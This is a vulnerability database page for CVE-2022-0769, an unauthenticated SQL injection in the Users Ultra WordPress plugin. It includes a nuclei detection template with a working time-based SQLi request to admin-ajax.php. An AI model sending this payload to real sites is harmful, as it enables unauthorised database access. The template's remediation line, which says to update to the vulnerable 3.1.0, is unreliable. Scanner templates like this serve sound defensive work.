Lucene search
K

Users Ultra <= 3.1.0 - SQL Injection

🗓️ 21 Jun 2026 03:03:41Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Users Ultra <= 3.1.0 - SQL Injection vulnerability, allowing unauthorized SQL queries and data leakage. Update to version 3.1.0 or later

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0769
25 Apr 202216:16
attackerkb
Circl
CVE-2022-0769
26 Jan 202500:00
circl
CNNVD
WordPress plugin Users Ultra SQL注入漏洞
25 Apr 202200:00
cnnvd
CNVD
WordPress插件Users Ultra SQL注入漏洞
27 Apr 202200:00
cnvd
CVE
CVE-2022-0769
25 Apr 202215:51
cve
Cvelist
CVE-2022-0769 Users Ultra <= 3.1.0 - Unauthenticated SQL Injection
25 Apr 202215:51
cvelist
NVD
CVE-2022-0769
25 Apr 202216:16
nvd
OSV
CVE-2022-0769
25 Apr 202216:16
osv
Patchstack
WordPress Users Ultra plugin <= 3.1.0 - Unauthenticated SQL Injection (SQLi) vulnerability
29 Mar 202200:00
patchstack
Prion
Sql injection
25 Apr 202216:16
prion
Rows per page
id: CVE-2022-0769

info:
  name: Users Ultra <= 3.1.0 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Update to Users Ultra version 3.1.0 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/05eab45d-ebe9-440f-b9c3-73ec40ef1141
    - https://wordpress.org/plugins/users-ultra/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0769
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0769
    cwe-id: CWE-89
    epss-score: 0.08415
    epss-percentile: 0.9428
    cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: usersultra
    product: users_ultra
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "You have to be logged in to leave your rate")'
        condition: and
# digest: 4a0a0047304502201cf8992f0f12f34bb0cb70867be1e6dda4e255662e22aede0d42ee441b68f811022100e8c5a4f4852a26c561abc62db74a13b053feea693464b4658dcae892b8533d20:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation